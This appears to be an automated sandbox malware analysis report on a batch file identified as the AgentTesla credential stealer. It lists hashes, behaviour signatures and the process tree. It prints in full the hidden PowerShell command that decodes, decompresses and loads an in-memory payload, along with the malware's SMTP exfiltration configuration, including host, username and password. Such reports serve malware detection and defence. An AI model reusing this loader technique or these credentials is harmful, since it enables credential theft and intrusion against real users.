Edit tour
Windows
Analysis Report
PRODUCT-PICTURE.bat
Overview
General Information
| Sample name: | PRODUCT-PICTURE.bat |
| Analysis ID: | 1547842 |
| MD5: | f131dee7460f93f201972c93f2d69ae5 |
| SHA1: | 124fb3a362a9677c249670cb3440c6881a4507e3 |
| SHA256: | 4429d220f63c6d7804095c2d67eeecde325e4989393dc67be19bb61d5833c880 |
| Tags: | AgentTeslabatuser-TeamDreier |
| Infos: |   |
 | |
Detection
AgentTesla
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found large BAT file
Injects a PE file into a foreign processes
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 7336 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\PRODU CT-PICTURE .bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7344 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
chcp.com (PID: 7392 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - cmd.exe (PID: 7408 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - xcopy.exe (PID: 7416 cmdline:
xcopy /d / q /y /h /i C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe C :\Users\us er\Desktop \PRODUCT-P ICTURE.bat .Usq MD5: 39FBFD3AF58238C6F9D4D408C9251FF5) - attrib.exe (PID: 7444 cmdline:
attrib +s +h C:\User s\user\Des ktop\PRODU CT-PICTURE .bat.Usq MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) 
PRODUCT-PICTURE.bat.Usq (PID: 7460 cmdline: C:\Users\u ser\Deskto p\PRODUCT- PICTURE.ba t.Usq -Win dowStyle h idden -com mand "$Gcb nyd = get- content 'C :\Users\us er\Desktop \PRODUCT-P ICTURE.bat ' | Select -Object -L ast 1; $Wb qkngq = [S ystem.Conv ert]::From Base64Stri ng($Gcbnyd );$Wwtukg = New-Obje ct System. IO.MemoryS tream( , $ Wbqkngq ); $Dsvtbpwio op = New-O bject Syst em.IO.Memo ryStream;$ Aslrlsosng = New-Obj ect System .IO.Compre ssion.Gzip Stream $Ww tukg, ([IO .Compressi on.Compres sionMode]: :Decompres s);$Aslrls osng.CopyT o( $Dsvtbp wioop );$A slrlsosng. Close();$W wtukg.Clos e();[byte[ ]] $Wbqkng q = $Dsvtb pwioop.ToA rray();[Ar ray]::Reve rse($Wbqkn gq); $Fmbt k = [Syste m.AppDomai n]::Curren tDomain.Lo ad($Wbqkng q); $Gxbkj ncruwk = $ Fmbtk.Entr yPoint; $G xbkjncruwk .Declaring Type.Invok eMember($G xbkjncruwk .Name, [Sy stem.Refle ction.Bind ingFlags]: :InvokeMet hod, $null , $null, $ null)| Out -Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - InstallUtil.exe (PID: 7580 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
wscript.exe (PID: 7768 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \IV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7816 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\IV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 7860 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - cmd.exe (PID: 7880 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - xcopy.exe (PID: 7888 cmdline:
xcopy /d / q /y /h /i C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe C :\Users\us er\AppData \Roaming\I V.bat.Usq MD5: 39FBFD3AF58238C6F9D4D408C9251FF5) - attrib.exe (PID: 7912 cmdline:
attrib +s +h C:\User s\user\App Data\Roami ng\IV.bat. Usq MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - IV.bat.Usq (PID: 7928 cmdline:
C:\Users\u ser\AppDat a\Roaming\ IV.bat.Usq -WindowSt yle hidden -command "$Gcbnyd = get-conte nt 'C:\Use rs\user\Ap pData\Roam ing\IV.bat ' | Select -Object -L ast 1; $Wb qkngq = [S ystem.Conv ert]::From Base64Stri ng($Gcbnyd );$Wwtukg = New-Obje ct System. IO.MemoryS tream( , $ Wbqkngq ); $Dsvtbpwio op = New-O bject Syst em.IO.Memo ryStream;$ Aslrlsosng = New-Obj ect System .IO.Compre ssion.Gzip Stream $Ww tukg, ([IO .Compressi on.Compres sionMode]: :Decompres s);$Aslrls osng.CopyT o( $Dsvtbp wioop );$A slrlsosng. Close();$W wtukg.Clos e();[byte[ ]] $Wbqkng q = $Dsvtb pwioop.ToA rray();[Ar ray]::Reve rse($Wbqkn gq); $Fmbt k = [Syste m.AppDomai n]::Curren tDomain.Lo ad($Wbqkng q); $Gxbkj ncruwk = $ Fmbtk.Entr yPoint; $G xbkjncruwk .Declaring Type.Invok eMember($G xbkjncruwk .Name, [Sy stem.Refle ction.Bind ingFlags]: :InvokeMet hod, $null , $null, $ null)| Out -Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - InstallUtil.exe (PID: 8084 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 32 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| Click to see the 16 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||